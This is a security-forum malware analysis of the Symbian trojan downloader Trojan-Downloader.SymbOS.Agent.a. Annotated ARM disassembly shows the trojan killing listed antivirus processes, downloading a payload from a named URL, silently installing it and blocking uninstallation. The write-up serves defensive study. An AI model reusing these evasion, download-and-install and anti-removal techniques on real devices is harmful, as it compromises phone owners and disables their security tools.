[分享]病毒分析：Trojan-Downloader.SymbOS.Agent.a-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[分享]病毒分析：Trojan-Downloader.SymbOS.Agent.a

发表于: 2012-7-3 15:58 9847

[分享]病毒分析：Trojan-Downloader.SymbOS.Agent.a

coderui

2012-7-3 15:58

9847

病毒名称：Trojan-Downloader.SymbOS.Agent.a
SHA1：e155055244e734142c2abe7f45f17eb2f6c63889
平台：symbian (S60 3th and 5th)
分析人员：Coderui
分析日期：2011-8-28

病毒行为概要：
安装包的功能：病毒安装包在安装时，显示的软件名称为“Service DS Group”，会在101f875a中创建开机自启动项“[200419A4].rsc”，安装包安装完毕后会自动调用运行病毒主程序“Loader_0x200419A4.exe”，卸载时自动调用运行防卸载程序“Keep_0x200419A5.exe”。在手机中安装如下文件：“!:\sys\bin\Keep_0x200419A5.exe”、“!:\sys\bin\Loader_0x200419A4.exe”、“c:\private\101f875a\import\[200419A4].rsc”、“c:\data\Myapplicationhelp.xml”、“c:\private\200419A4\Version.txt”。

病毒程序功能：首次运行时，会弹出提示框“诺基亚S60组件安装成功。”，并在2秒后自动关闭，然后继续运行。具有反安全软件的功能，在后台遍历进程，强行关闭如下进程：“Qh360,2002593,s360,2000EED,Agile,MoAshm,NqAv,NqEng,HighCap,NqHc,NQCom,NQPhone,dgserver,Mobile110,QQPim,pw_main,workFire”。下载“http://sb.huasky.net/update/load_v1.10.sisx”保存为“c:\Data\Others\DocumentLogs.dat”。将“c:\Data\Others\DocumentLogs.dat”重新命名为“c:\Data\Others\DocumentLogs.sis”。以静默安装的方式，安装“c:\Data\Others\DocumentLogs.sis”(下载回来的恶意软件)到手机中。该病毒具有防卸载功能(卸载时系统会自动调用运行Keep_0x200419A5.exe组件，其会关闭系统卸载程序installserver.exe和SWInstSvrUI.exe两个进程，并弹出提示信息“This is a Nokia S60 update components, please don't deleted!”)，无法使用系统自带的卸载功能卸载该病毒。

Loader_0x200419A4.exe程序关键点的反汇编代码（附件：Loader_0x200419A4.idb）：
----------------------------------------------------------------------------------------------------------------------
首次运行时，弹提示框[诺基亚S60组件安装成功。]，2秒左右自动关闭：
.text:71260E64 0D C0 A0 E1 MOV    R12, SP
.text:71260E68 60 D8 2D E9 STMFD SP!, {R5,R6,R11,R12,LR,PC}
.text:71260E6C 04 B0 4C E2 SUB    R11, R12, #4
.text:71260E70 01 60 A0 E1 MOV    R6, R1
.text:71260E74 1F 08 00 EB BL    _ZN14CAknGlobalNote4NewLEv    ; CAknGlobalNote::NewL(void)
.text:71260E78 00 50 A0 E1 MOV    R5, R0
.text:71260E7C BD 07 00 EB BL    _ZN12CleanupStack5PushLEP5CBase ; CleanupStack::PushL(CBase *)
.text:71260E80 05 00 A0 E1 MOV    R0, R5
.text:71260E84 06 20 A0 E1 MOV    R2, R6
.text:71260E88 01 10 A0 E3 MOV    R1, #1
.text:71260E8C E5 07 00 EB BL    _ZN14CAknGlobalNote9ShowNoteLE18TAknGlobalNoteTypeRK7TDesC16 ; CAknGlobalNote::ShowNoteL(TAknGlobalNoteType,TDesC16  const&) ; 弹窗
.text:71260E90 60 68 9D E8 LDMFD SP, {R5,R6,R11,SP,LR}
.text:71260E94 5D 07 00 EA B    _ZN12CleanupStack13PopAndDestroyEv ; CleanupStack::PopAndDestroy(void)

要关闭的进程名，反安全软件[进程名数据]：
Qh360,2002593,s360,2000EED,Agile,MoAshm,NqAv,NqEng,HighCap,NqHc,NQCom,NQPhone,dgserver,Mobile110,QQPim,pw_main,workFire
循环读[进程名]的配置列表，并遍历进程与其匹配：
.text:71260DB4 0D C0 A0 E1 MOV    R12, SP
.text:71260DB8 F0 D8 2D E9 STMFD SP!, {R4-R7,R11,R12,LR,PC}
.text:71260DBC 04 B0 4C E2 SUB    R11, R12, #4
.text:71260DC0 89 7F 4B E2 SUB    R7, R11, #-var_224
.text:71260DC4 42 5E 4B E2 SUB    R5, R11, #-var_420
.text:71260DC8 01 1C A0 E3 MOV    R1, #0x100
.text:71260DCC 00 60 A0 E1 MOV    R6, R0
.text:71260DD0 0C 50 45 E2 SUB    R5, R5, #0xC
.text:71260DD4 07 00 A0 E1 MOV    R0, R7
.text:71260DD8 00 40 A0 E3 MOV    R4, #0
.text:71260DDC 41 DE 4D E2 SUB    SP, SP, #0x410
.text:71260DE0 98 07 00 EB BL    _ZN10TBufBase16C2Ei          ; TBufBase16::TBufBase16(int)
.text:71260DE4 01 1C A0 E3 MOV    R1, #0x100
.text:71260DE8 05 00 A0 E1 MOV    R0, R5
.text:71260DEC 95 07 00 EB BL    _ZN10TBufBase16C2Ei          ; TBufBase16::TBufBase16(int)
.text:71260DF0 68 00 9F E5 LDR    R0, =dword_7126321C
.text:71260DF4 B7 00 00 EB BL    nullsub_15
.text:71260DF8 00 20 A0 E1 MOV    R2, R0
.text:71260DFC 02 10 A0 E1 MOV    R1, R2
.text:71260E00 07 00 A0 E1 MOV    R0, R7
.text:71260E04 E1 07 00 EB BL    _ZN6TDes164CopyERK7TDesC16    ; TDes16::Copy(TDesC16  const&)
.text:71260E08 01 00 00 EA B    loc_71260E14
.text:71260E0C 27 00 54 E3 CMP    R4, #0x27 ; '''
.text:71260E10 10 00 00 CA BGT    loc_71260E58
.text:71260E14 04 30 A0 E1 MOV    R3, R4
.text:71260E18 07 10 A0 E1 MOV    R1, R7
.text:71260E1C 05 20 A0 E1 MOV    R2, R5
.text:71260E20 06 00 A0 E1 MOV    R0, R6
.text:71260E24 9F FF FF EB BL    sub_71260CA8
.text:71260E28 00 00 50 E3 CMP    R0, #0
.text:71260E2C 01 40 84 E2 ADD    R4, R4, #1
.text:71260E30 05 10 A0 E1 MOV    R1, R5
.text:71260E34 06 00 A0 E1 MOV    R0, R6
.text:71260E38 06 00 00 0A BEQ    loc_71260E58
.text:71260E3C 2C 34 1B E5 LDR    R3, [R11,#var_42C]
.text:71260E40 0F 32 C3 E3 BIC    R3, R3, #0xF0000000
.text:71260E44 02 00 53 E3 CMP    R3, #2
.text:71260E48 EF FF FF DA BLE    loc_71260E0C
.text:71260E4C 92 FE FF EB BL    sub_7126089C ; 遍历进程函数[匹配到指定进程名就将其关闭]
.text:71260E50 27 00 54 E3 CMP    R4, #0x27 ; '''
.text:71260E54 EE FF FF DA BLE    loc_71260E14
.text:71260E58 1C D0 4B E2 SUB    SP, R11, #0x1C
.text:71260E5C F0 A8 9D E8 LDMFD SP, {R4-R7,R11,SP,PC}

遍历进程函数[匹配到指定进程名就将其关闭]：
.text:7126089C 0D C0 A0 E1 MOV    R12, SP
.text:712608A0 F0 D9 2D E9 STMFD SP!, {R4-R8,R11,R12,LR,PC}
.text:712608A4 04 B0 4C E2 SUB    R11, R12, #4
.text:712608A8 8B 6F 4B E2 SUB    R6, R11, #-var_22C
.text:712608AC 11 5D 4B E2 SUB    R5, R11, #-var_440
.text:712608B0 01 80 A0 E1 MOV    R8, R1
.text:712608B4 06 00 A0 E1 MOV    R0, R6
.text:712608B8 01 1C A0 E3 MOV    R1, #0x100
.text:712608BC 04 50 45 E2 SUB    R5, R5, #4
.text:712608C0 11 7D 4B E2 SUB    R7, R11, #-var_440
.text:712608C4 04 70 47 E2 SUB    R7, R7, #4
.text:712608C8 04 70 47 E2 SUB    R7, R7, #4
.text:712608CC 42 DE 4D E2 SUB    SP, SP, #0x420
.text:712608D0 0C D0 4D E2 SUB    SP, SP, #0xC
.text:712608D4 DB 08 00 EB BL    _ZN10TBufBase16C2Ei          ; TBufBase16::TBufBase16(int)
.text:712608D8 05 00 A0 E1 MOV    R0, R5
.text:712608DC 1B 09 00 EB BL    _ZN15TFindHandleBaseC2Ev       ; TFindHandleBase::TFindHandleBase(void)
.text:712608E0 06 10 A0 E1 MOV    R1, R6
.text:712608E4 05 00 A0 E1 MOV    R0, R5
.text:712608E8 E6 08 00 EB BL    _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712608EC 00 40 50 E2 SUBS R4, R0, #0
.text:712608F0 08 10 A0 E1 MOV    R1, R8
.text:712608F4 06 00 A0 E1 MOV    R0, R6
.text:712608F8 16 00 00 1A BNE    loc_71260958
.text:712608FC 51 09 00 EB BL    _ZNK7TDesC165FindFERKS_       ; TDesC16::FindF(TDesC16 const&)
.text:71260900 02 31 A0 E3 MOV    R3, #0x80000000
.text:71260904 01 00 70 E3 CMN    R0, #1
.text:71260908 04 20 A0 E1 MOV    R2, R4
.text:7126090C 43 38 A0 E1 MOV    R3, R3,ASR#16
.text:71260910 05 10 A0 E1 MOV    R1, R5
.text:71260914 07 00 A0 E1 MOV    R0, R7
.text:71260918 F0 FF FF 0A BEQ    loc_712608E0
.text:7126091C 48 34 0B E5 STR    R3, [R11,#var_448]
.text:71260920 44 09 00 EB BL    _ZN11RHandleBase4OpenERK15TFindHandleBase10TOwnerType ; RHandleBase::Open(TFindHandleBase  const&,TOwnerType)
.text:71260924 00 10 50 E2 SUBS R1, R0, #0
.text:71260928 07 00 A0 E1 MOV    R0, R7
.text:7126092C EB FF FF 1A BNE    loc_712608E0
.text:71260930 3E 09 00 EB BL    _ZN8RProcess4KillEi          ; RProcess::Kill(int)
.text:71260934 07 00 A0 E1 MOV    R0, R7
.text:71260938 36 09 00 EB BL    _ZN11RHandleBase5CloseEv       ; RHandleBase::Close(void)
.text:7126093C 06 10 A0 E1 MOV    R1, R6
.text:71260940 05 00 A0 E1 MOV    R0, R5
.text:71260944 CF 08 00 EB BL    _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:71260948 00 40 50 E2 SUBS R4, R0, #0
.text:7126094C 08 10 A0 E1 MOV    R1, R8
.text:71260950 06 00 A0 E1 MOV    R0, R6
.text:71260954 E8 FF FF 0A BEQ    loc_712608FC
.text:71260958 20 D0 4B E2 SUB    SP, R11, #0x20
.text:7126095C F0 A9 9D E8 LDMFD SP, {R4-R8,R11,SP,PC}

下载文件的函数[下载“http://sb.huasky.net/update/load_v1.10.sisx”保存为“c:\Data\Others\DocumentLogs.dat”]：
.text:71261238 0D C0 A0 E1 MOV    R12, SP
.text:7126123C 70 D8 2D E9 STMFD SP!, {R4-R6,R11,R12,LR,PC}
.text:71261240 04 B0 4C E2 SUB    R11, R12, #4
.text:71261244 84 12 9F E5 LDR    R1, =0x55555556
.text:71261248 00 50 A0 E1 MOV    R5, R0
.text:7126124C C5 DF 4D E2 SUB    SP, SP, #0x314
.text:71261250 34 C0 90 E5 LDR    R12, [R0,#0x34]
.text:71261254 38 30 9C E5 LDR    R3, [R12,#0x38]
.text:71261258 91 E3 C2 E0 SMULL LR, R2, R1, R3
.text:7126125C C3 2F 42 E0 SUB    R2, R2, R3,ASR#31
.text:71261260 82 20 82 E0 ADD    R2, R2, R2,LSL#1
.text:71261264 03 30 62 E0 RSB    R3, R2, R3
.text:71261268 01 00 53 E3 CMP    R3, #1
.text:7126126C 00 E0 A0 E3 MOV    LR, #0
.text:71261270 73 00 00 0A BEQ    loc_71261444
.text:71261274 38 10 9C E5 LDR    R1, [R12,#0x38]
.text:71261278 50 22 9F E5 LDR    R2, =0x55555556
.text:7126127C 92 01 C3 E0 SMULL R0, R3, R2, R1
.text:71261280 C1 3F 43 E0 SUB    R3, R3, R1,ASR#31
.text:71261284 83 30 83 E0 ADD    R3, R3, R3,LSL#1
.text:71261288 03 00 51 E1 CMP    R1, R3
.text:7126128C 01 00 00 1A BNE    loc_71261298
.text:71261290 00 00 5E E3 CMP    LR, #0
.text:71261294 60 00 00 0A BEQ    loc_7126141C
.text:71261298 38 30 9C E5 LDR    R3, [R12,#0x38]
.text:7126129C 2C 12 9F E5 LDR    R1, =0x55555556
.text:712612A0 91 03 C2 E0 SMULL R0, R2, R1, R3
.text:712612A4 C3 2F 42 E0 SUB    R2, R2, R3,ASR#31
.text:712612A8 82 20 82 E0 ADD    R2, R2, R2,LSL#1
.text:712612AC 03 30 62 E0 RSB    R3, R2, R3
.text:712612B0 02 00 53 E3 CMP    R3, #2
.text:712612B4 42 00 00 0A BEQ    loc_712613C4
.text:712612B8 08 60 85 E2 ADD    R6, R5, #8
.text:712612BC 0E 20 A0 E1 MOV    R2, LR
.text:712612C0 01 10 A0 E3 MOV    R1, #1
.text:712612C4 06 00 A0 E1 MOV    R0, R6
.text:712612C8 A8 06 00 EB BL    _ZN16RHttpDownloadMgr15SetIntAttributeEjl ; RHttpDownloadMgr::SetIntAttribute(uint,long)
.text:712612CC 49 4F 4B E2 SUB    R4, R11, #-var_124
.text:712612D0 76 06 00 EB BL    _ZN4User12LeaveIfErrorEi       ; User::LeaveIfError(int)
.text:712612D4 01 1C A0 E3 MOV    R1, #0x100
.text:712612D8 04 00 A0 E1 MOV    R0, R4
.text:712612DC A1 06 00 EB BL    _ZN9TBufBase8C2Ei             ; TBufBase8::TBufBase8(int)
.text:712612E0 EC 01 9F E5 LDR    R0, =dword_712635B0
.text:712612E4 43 02 00 EB BL    nullsub_19
.text:712612E8 00 20 A0 E1 MOV    R2, R0
.text:712612EC 02 10 A0 E1 MOV    R1, R2
.text:712612F0 04 00 A0 E1 MOV    R0, R4
.text:712612F4 E5 06 00 EB BL    _ZN5TDes84CopyERK6TDesC8       ; TDes8::Copy(TDesC8  const&)
.text:712612F8 06 00 A0 E1 MOV    R0, R6
.text:712612FC 39 06 00 EB BL    _ZN16RHttpDownloadMgr9DeleteAllEv ; RHttpDownloadMgr::DeleteAll(void)
.text:71261300 04 20 85 E2 ADD    R2, R5, #4
.text:71261304 04 10 A0 E1 MOV    R1, R4
.text:71261308 06 00 A0 E1 MOV    R0, R6
.text:7126130C E9 06 00 EB BL    _ZN16RHttpDownloadMgr15CreateDownloadLERK6TDesC8Ri ; RHttpDownloadMgr::CreateDownloadL(TDesC8  const&,int &)
.text:71261310 00 60 A0 E1 MOV    R6, R0
.text:71261314 BC 01 9F E5 LDR    R0, =dword_71263540
.text:71261318 33 02 00 EB BL    nullsub_16
.text:7126131C CB 4F 4B E2 SUB    R4, R11, #-var_32C
.text:71261320 00 10 A0 E1 MOV    R1, R0
.text:71261324 34 00 95 E5 LDR    R0, [R5,#0x34]
.text:71261328 8C FD FF EB BL    sub_71260960
.text:7126132C 01 1C A0 E3 MOV    R1, #0x100
.text:71261330 04 00 A0 E1 MOV    R0, R4
.text:71261334 43 06 00 EB BL    _ZN10TBufBase16C2Ei          ; TBufBase16::TBufBase16(int)
.text:71261338 9C 01 9F E5 LDR    R0, =dword_712634FC
.text:7126133C 2C FF FF EB BL    nullsub_11
.text:71261340 00 20 A0 E1 MOV    R2, R0
.text:71261344 02 10 A0 E1 MOV    R1, R2
.text:71261348 04 00 A0 E1 MOV    R0, R4
.text:7126134C 8F 06 00 EB BL    _ZN6TDes164CopyERK7TDesC16    ; TDes16::Copy(TDesC16  const&)
.text:71261350 04 20 A0 E1 MOV    R2, R4
.text:71261354 CF 10 A0 E3 MOV    R1, #0xCF ; '?
.text:71261358 06 00 A0 E1 MOV    R0, R6
.text:7126135C 2F 06 00 EB BL    _ZN13RHttpDownload18SetStringAttributeEjRK7TDesC16 ; RHttpDownload::SetStringAttribute(uint,TDesC16  const&)
.text:71261360 FA 1F A0 E3 03+MOV    R1, 0x3EB
.text:71261368 01 20 A0 E3 MOV    R2, #1
.text:7126136C 06 00 A0 E1 MOV    R0, R6
.text:71261370 9C 06 00 EB BL    _ZN13RHttpDownload15SetIntAttributeEjl ; RHttpDownload::SetIntAttribute(uint,long)
.text:71261374 3F 1E A0 E3 MOV    R1, #0x3F0
.text:71261378 01 20 A0 E3 MOV    R2, #1
.text:7126137C 06 00 A0 E1 MOV    R0, R6
.text:71261380 84 06 00 EB BL    _ZN13RHttpDownload16SetBoolAttributeEji ; RHttpDownload::SetBoolAttribute(uint,int)
.text:71261384 3F 1E A0 E3 MOV    R1, #0x3F0
.text:71261388 06 00 A0 E1 MOV    R0, R6
.text:7126138C 01 10 81 E2 ADD    R1, R1, #1
.text:71261390 01 20 A0 E3 MOV    R2, #1
.text:71261394 7F 06 00 EB BL    _ZN13RHttpDownload16SetBoolAttributeEji ; RHttpDownload::SetBoolAttribute(uint,int)
.text:71261398 04 30 95 E5 LDR    R3, [R5,#4]
.text:7126139C 00 00 53 E3 CMP    R3, #0
.text:712613A0 03 00 00 0A BEQ    loc_712613B4
.text:712613A4 06 00 A0 E1 MOV    R0, R6
.text:712613A8 14 06 00 EB BL    _ZN13RHttpDownload5StartEv    ; RHttpDownload::Start(void) ; 开始执行下载
.text:712613AC 18 D0 4B E2 SUB    SP, R11, #0x18
.text:712613B0 70 A8 9D E8 LDMFD SP, {R4-R6,R11,SP,PC} ; 返回

文件重新命名[将“c:\Data\Others\DocumentLogs.dat”重新命名为“c:\Data\Others\DocumentLogs.sis”]：
.text:71260A68 5C 08 00 EB BL    _ZN9BaflUtils10RenameFileER3RFsRK7TDesC16S4_j ; BaflUtils::RenameFile(RFs &,TDesC16  const&,TDesC16  const&,uint)

静默安装[安装下载回来的文件“c:\Data\Others\DocumentLogs.sis”]：
.text:71261644 BF 05 00 EB BL    SWInstCli_4 ; 安装下载回来的文件“c:\Data\Others\DocumentLogs.sis”

条件选择，功能分支（switch）：
.text:712604CC 0D C0 A0 E1 MOV    R12, SP
.text:712604D0 30 D8 2D E9 STMFD SP!, {R4,R5,R11,R12,LR,PC}
.text:712604D4 04 B0 4C E2 SUB    R11, R12, #4
.text:712604D8 00 40 A0 E1 MOV    R4, R0
.text:712604DC 1C 30 90 E5 LDR    R3, [R0,#0x1C]
.text:712604E0 00 00 53 E3 CMP    R3, #0
.text:712604E4 10 00 00 0A BEQ    loc_7126052C ; 遍历进程函数[匹配到指定进程名就将其关闭]
.text:712604E8 01 00 53 E3 CMP    R3, #1
.text:712604EC 7A 00 00 0A BEQ    loc_712606DC
.text:712604F0 02 00 53 E3 CMP    R3, #2
.text:712604F4 22 00 00 0A BEQ    loc_71260584
.text:712604F8 03 00 53 E3 CMP    R3, #3
.text:712604FC 92 00 00 0A BEQ    loc_7126074C ; 下载文件
.text:71260500 04 00 53 E3 CMP    R3, #4
.text:71260504 59 00 00 0A BEQ    loc_71260670
.text:71260508 05 00 53 E3 CMP    R3, #5
.text:7126050C 50 00 00 0A BEQ    loc_71260654
.text:71260510 06 00 53 E3 CMP    R3, #6
.text:71260514 12 00 00 1A BNE    loc_71260564
.text:71260518 90 02 9F E5 LDR    R0, =dword_71263018
.text:7126051C B6 02 00 EB BL    nullsub_13
.text:71260520 08 FF FF EB BL    nullsub_2
.text:71260524 BF 09 00 EB BL    _ZN16CActiveScheduler4StopEv ; CActiveScheduler::Stop(void)
.text:71260528 0D 00 00 EA B    loc_71260564
----------------------------------------------------------------------------------------------------------------------

Keep_0x200419A5.exe程序关键点的反汇编代码（附件：Keep_0x200419A5.idb）：
----------------------------------------------------------------------------------------------------------------------
用户代码核心部分：
.text:712F81C0                MOV    R12, SP
.text:712F81C4                STMFD SP!, {R11,R12,LR,PC}
.text:712F81C8                LDR    R0, =dword_712F9318
.text:712F81CC                SUB    R11, R12, #4
.text:712F81D0                BL    Coderui_sub_1 ; 防卸载：遍历关闭指定进程(installserver.exe、SWInstSvrUI.exe)
.text:712F81D4                LDR    R0, =dword_712F92F0
.text:712F81D8                BL    nullsub_1
.text:712F81DC                BL    Coderui_sub_1 ; 防卸载：遍历关闭指定进程(installserver.exe、SWInstSvrUI.exe)
.text:712F81E0                LDR    R0, =dword_712F933C
.text:712F81E4                BL    nullsub_2
.text:712F81E8                BL    Coderui_sub_2 ; 弹出提示信息：This is a Nokia S60 update components, please don't deleted!
.text:712F81EC                LDR    R0, =dword_712F92C0
.text:712F81F0                BL    nullsub_3
.text:712F81F4                LDMFD SP, {R11,SP,LR}
.text:712F81F8                B    sub_712F8030

防卸载：遍历关闭指定进程(installserver.exe、SWInstSvrUI.exe)：
.text:712F80C8                MOV    R12, SP
.text:712F80CC                STMFD SP!, {R4-R8,R11,R12,LR,PC}
.text:712F80D0                SUB    R11, R12, #4
.text:712F80D4                SUB    R6, R11, #-var_22C
.text:712F80D8                SUB    R5, R11, #-var_440
.text:712F80DC                MOV    R1, #0x100
.text:712F80E0                MOV    R8, R0
.text:712F80E4                SUB    R5, R5, #4
.text:712F80E8                MOV    R0, R6
.text:712F80EC                SUB    R7, R11, #-var_440
.text:712F80F0                SUB    R7, R7, #4
.text:712F80F4                SUB    R7, R7, #4
.text:712F80F8                SUB    SP, SP, #0x420
.text:712F80FC                SUB    SP, SP, #0xC
.text:712F8100                BL    _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:712F8104                MOV    R0, R5
.text:712F8108                BL    _ZN15TFindHandleBaseC2Ev ; TFindHandleBase::TFindHandleBase(void)
.text:712F810C                MOV    R1, R6
.text:712F8110                MOV    R0, R5
.text:712F8114                BL    _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712F8118                SUBS R4, R0, #0
.text:712F811C                MOV    R1, R8
.text:712F8120                MOV    R0, R6
.text:712F8124                BNE    loc_712F8184
.text:712F8128                BL    _ZNK7TDesC165FindFERKS_ ; TDesC16::FindF(TDesC16 const&)
.text:712F812C                MOV    R3, #0x80000000
.text:712F8130                CMN    R0, #1
.text:712F8134                MOV    R2, R4
.text:712F8138                MOV    R3, R3,ASR#16
.text:712F813C                MOV    R1, R5
.text:712F8140                MOV    R0, R7
.text:712F8144                BEQ    loc_712F810C
.text:712F8148                STR    R3, [R11,#var_448]
.text:712F814C                BL    _ZN11RHandleBase4OpenERK15TFindHandleBase10TOwnerType ; RHandleBase::Open(TFindHandleBase  const&,TOwnerType)
.text:712F8150                SUBS R1, R0, #0
.text:712F8154                MOV    R0, R7
.text:712F8158                BNE    loc_712F810C
.text:712F815C                BL    _ZN8RProcess4KillEi ; RProcess::Kill(int)
.text:712F8160                MOV    R0, R7
.text:712F8164                BL    _ZN11RHandleBase5CloseEv ; RHandleBase::Close(void)
.text:712F8168                MOV    R1, R6
.text:712F816C                MOV    R0, R5
.text:712F8170                BL    _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712F8174                SUBS R4, R0, #0
.text:712F8178                MOV    R1, R8
.text:712F817C                MOV    R0, R6
.text:712F8180                BEQ    loc_712F8128
.text:712F8184                SUB    SP, R11, #0x20
.text:712F8188                LDMFD SP, {R4-R8,R11,SP,PC}

弹出提示信息：This is a Nokia S60 update components, please don't deleted!：
.text:712F818C                MOV    R12, SP
.text:712F8190                STMFD SP!, {R5,R7,R11,R12,LR,PC}
.text:712F8194                SUB    R11, R12, #4
.text:712F8198                MOV    R7, R0
.text:712F819C                BL    _ZN14CAknGlobalNote4NewLEv ; CAknGlobalNote::NewL(void)
.text:712F81A0                MOV    R5, R0
.text:712F81A4                BL    _ZN12CleanupStack5PushLEP5CBase ; CleanupStack::PushL(CBase *)
.text:712F81A8                MOV    R0, R5
.text:712F81AC                MOV    R2, R7
.text:712F81B0                MOV    R1, #1
.text:712F81B4                BL    _ZN14CAknGlobalNote9ShowNoteLE18TAknGlobalNoteTypeRK7TDesC16 ; CAknGlobalNote::ShowNoteL(TAknGlobalNoteType,TDesC16  const&)
.text:712F81B8                LDMFD SP, {R5,R7,R11,SP,LR}
.text:712F81BC                B    _ZN12CleanupStack13PopAndDestroyEv ; CleanupStack::PopAndDestroy(void)
----------------------------------------------------------------------------------------------------------------------

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・1

免费・6

支持

最新回复 (1)
lisalan 雪币： 75 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 71 粉丝 0 关注私信	lisalan 2 楼撸主,样本地址在哪里啊,让我试试撒 2013-5-25 14:20 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

coderui

发帖

188

回帖

120

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (1)
lisalan 雪币： 75 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 71 粉丝 0 关注私信	lisalan 2 楼撸主,样本地址在哪里啊,让我试试撒 2013-5-25 14:20 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复